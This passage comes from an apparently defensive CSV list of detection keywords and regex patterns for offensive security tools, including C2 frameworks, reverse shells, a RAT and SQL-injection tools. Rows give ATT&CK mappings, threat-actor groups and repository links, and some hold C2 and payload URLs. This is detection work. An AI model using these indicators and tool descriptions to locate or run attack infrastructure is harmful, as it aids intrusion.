T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*http://127.0.0.1:8070*",".{0,1000}http\:\/\/127\.0\.0\.1\:8070.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*http://127.0.0.1:8080*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*http://127.0.0.1:8080/target.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/target\.dll.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*http://127.0.0.1:9090/*",".{0,1000}http\:\/\/127\.0\.0\.1\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http://192.168.1.179:8000/session*",".{0,1000}http\:\/\/192\.168\.1\.179\:8000\/session.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*http://212.111.43.206:9090/pk.html*",".{0,1000}http\:\/\/212\.111\.43\.206\:9090\/pk\.html.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*http://bit.ly/2TxpA4h*",".{0,1000}http\:\/\/bit\.ly\/2TxpA4h.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" 
"*http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe*",".{0,1000}http\:\/\/ec2\-52\-90\-251\-67\.compute\-1\.amazonaws\.com\/GoogleChromeAutoLaunch\.exe.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*http://LhOsT/FiLNaMe.*",".{0,1000}http\:\/\/LhOsT\/FiLNaMe\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*http://localhost/shell.jsp?pwd=System.out.println(*",".{0,1000}http\:\/\/localhost\/shell\.jsp\?pwd\=System\.out\.println\(.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*http://localhost:3000/ui/panel*",".{0,1000}http\:\/\/localhost\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http://localhost:30662*",".{0,1000}http\:\/\/localhost\:30662.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","991","211","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*http://localhost:58082/broadcast?id=*",".{0,1000}http\:\/\/localhost\:58082\/broadcast\?id\=.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*http://localhost:7474/browser/*",".{0,1000}http\:\/\/localhost\:7474\/browser\/.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*http://localhost:8000/emailviewer.html*",".{0,1000}http\:\/\/localhost\:8000\/emailviewer\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" 
"*http://localhost:8080*",".{0,1000}http\:\/\/localhost\:8080.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*http://localhost:9090/*",".{0,1000}http\:\/\/localhost\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http://nemesis/file*",".{0,1000}http\:\/\/nemesis\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis/yara*",".{0,1000}http\:\/\/nemesis\/yara.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-es-http.default.svc.cluster.local:9200*",".{0,1000}http\:\/\/nemesis\-es\-http\.default\.svc\.cluster\.local\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-es-internal-http:9200*",".{0,1000}http\:\/\/nemesis\-es\-internal\-http\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-kb-http.default.svc.cluster.local:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\.default\.svc\.cluster\.local\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-kb-http:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://shell:7681/token*",".{0,1000}http\:\/\/shell\:7681\/token.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*http://sniff.su/*.gz*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*http://sniff.su/*.zip*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*http://tarantula.by.ru/localroot/*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*http://vpsip:28888*",".{0,1000}http\:\/\/vpsip\:28888.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of 
Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*http://wfuzz.org*",".{0,1000}http\:\/\/wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*http://www.site.com/article.php?id=1*",".{0,1000}http\:\/\/www\.site\.com\/article\.php\?id\=1.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*http://www.site.com/vuln.php?id=1 --dbs*",".{0,1000}http\:\/\/www\.site\.com\/vuln\.php\?id\=1\s\-\-dbs.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*http_default_pass.txt*",".{0,1000}http_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_default_users.txt*",".{0,1000}http_default_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_malleable.py*",".{0,1000}http_malleable\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http_ntlmrelay.*",".{0,1000}http_ntlmrelay\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_owa_common.txt*",".{0,1000}http_owa_common\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_stager_client_header*",".{0,1000}http_stager_client_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_append*",".{0,1000}http_stager_server_append.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_header*",".{0,1000}http_stager_server_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_prepend*",".{0,1000}http_stager_server_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_uri_x64*",".{0,1000}http_stager_uri_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_uri_x86*",".{0,1000}http_stager_uri_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
